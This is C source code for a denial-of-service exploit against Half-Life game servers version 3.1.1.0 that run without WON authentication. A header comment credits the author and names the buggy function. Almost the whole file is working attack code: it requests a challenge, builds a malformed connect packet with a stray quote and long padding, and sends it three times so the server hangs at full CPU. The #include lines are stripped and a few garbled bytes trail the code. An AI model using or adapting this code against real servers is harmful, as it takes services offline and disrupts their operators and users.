/* This is a Denial-of-service exploit(if you can call this an exploit) against half-life-servers (without WON-authentication). I have tested this succesfully against half-life servers Exe version 3.1.1.0 under suse linux 7.3 and win2k. after sending 3 special-formed connect packets the server is unresponsible and use 100% cpu-power. This is only a fast hack, it's a result of playing a round with the sourcecodes from http://www.pivx.com/luigi/. And the malformed packet is a result, of an coding-accident. "Auch ein blindes Huhn, findet manchmal ein Korn" special thanks to aluigi@pivx.com. I have this code succesfully compiled with vc++. With some hits on your keyboard you can compile it under linux too, but i have no time. Have fun with this lame code. P.S you must link it with WS2_32.lib!!!!!!!!!!!!! `Delikon/5.4.03/ich@delikon.de/www.delikon.de` -----------------Binary----------- at www.delikon.de ---------------------------------- ----------problem description----- Mail me or look at the arrow which shows you the problem ---------------------------------- ---------patch-------------------- Hope that the half-life coders have time to code one, but i think this have time till the next version of halflife, because this is not a serious bug(only servers without WON-authentication can be crash) P.S Half-Life coders the bug is some where in the SV_CheckForDuplicateNames() function ---------------------------------- */ #include #include #include #include #include int startWinsock(void) { WSADATA wsa; return WSAStartup(MAKEWORD(2,0),&wsa); } int main(int argc, char *argv[]) { long rc; SOCKET s,s2,s3,s4; SOCKADDR_IN addr; SOCKADDR_IN remoteAddr; char buf[256]; char challenge[256]; int remoteAddrLen=sizeof(SOCKADDR_IN); char *connect1a; char get[]="\xff" "\xff\xff\xff\x67\x65\x74\x63\x68\x61\x6c" "\x6c\x65\x6e\x67\x65\x0a\x00"; char head[]="\xff" "\xff\xff\xff\x63\x6f\x6e\x6e\x65\x63\x74" "\x20\x34\x36\x20"; char connect1 []= "\x20" "\x22\x5c\x70\x72\x6f\x74" "\x5c\x32\x5c\x75\x6e\x69\x71\x75\x65\x5c" "\x2d\x31\x5c\x72\x61\x77\x5c" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41" "\x22" //<---the problem "\x22\x20\x22\x5c\x6d\x6f\x64" "\x65\x6c\x5c\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x5c\x74\x6f\x70" "\x63\x6f\x6c\x6f\x72\x5c\x31\x32\x38\x5c" "\x62\x6f\x74\x74\x6f\x6d\x63\x6f\x6c\x6f" "\x72\x5c\x31\x32\x38\x5c\x72\x61\x74\x65" "\x5c\x39\x39\x39\x39\x2e\x30\x30\x30\x30" "\x30\x30\x5c\x63\x6c\x5f\x75\x70\x64\x61" "\x74\x65\x72\x61\x74\x65\x5c\x32\x30\x5c" "\x63\x6c\x5f\x6c\x77\x5c\x31\x5c\x63\x6c" "\x5f\x6c\x63\x5c\x31\x5c\x63\x6c\x5f\x64" "\x6c\x6d\x61\x78\x5c\x31\x32\x38\x5c\x68" "\x75\x64\x5f\x63\x6c\x61\x73\x73\x61\x75" "\x74\x6f\x6b\x69\x6c\x6c\x5c\x31\x5c\x6e" "\x61\x6d\x65\x5c\x74\x65\x73\x74\x22\x0a"; memset(buf,0,strlen(buf)); memset(challenge,0,strlen(challenge)); if (argc<3) { printf("\n%s \n", argv[0]); exit(1); } else { printf("Denial-of-Service exploit against half-life servers version 3.1.1.0\n"); printf("Found and coded by Delikon | 7.4.03 | www.delikon.de | ich@delikon.de \n"); } rc=startWinsock(); if(rc!=0) { printf("Error : startWinsock, error code: %d\n",rc); return 1; } s=socket(AF_INET,SOCK_DGRAM,0); if(s==INVALID_SOCKET) { printf("Error: couldn't create the socket , error code: %d\n",WSAGetLastError()); return 1; } addr.sin_family=AF_INET; addr.sin_addr.s_addr =inet_addr(argv[1]); addr.sin_port=htons(atoi(argv[2])); rc=sendto(s,get,strlen(get),0,(SOCKADDR*)&addr,sizeof(SOCKADDR_IN)); if(rc==SOCKET_ERROR) { printf("Fehler: sendto, fehler code: %d\n",WSAGetLastError()); return 1; } rc=recvfrom(s,buf,256,0,(SOCKADDR*)&remoteAddr,&remoteAddrLen); strcpy(challenge,buf+14); challenge[strlen(challenge)-3]='\0'; printf("Challenge:%s\n",challenge); closesocket(s); connect1a=(char *)malloc (sizeof(head)+sizeof(challenge)+sizeof(connect1)); strcpy(connect1a,head); strcat(connect1a,challenge); strcat(connect1a,connect1); s2=socket(AF_INET,SOCK_DGRAM,0); rc=sendto(s2,connect1a,strlen(connect1a),0,(SOCKADDR*)&addr,sizeof(SOCKADDR_IN)); Sleep(120); closesocket(s2); s3=socket(AF_INET,SOCK_DGRAM,0); rc=sendto(s3,connect1a,strlen(connect1a),0,(SOCKADDR*)&addr,sizeof(SOCKADDR_IN)); Sleep(120); closesocket(s3); s4=socket(AF_INET,SOCK_DGRAM,0); rc=sendto(s4,connect1a,strlen(connect1a),0,(SOCKADDR*)&addr,sizeof(SOCKADDR_IN)); Sleep(120); closesocket(s4); printf("\n\n Server is down!!! ??? or ?? check it ;-)\n\n"); exit(1); }

��ŷ��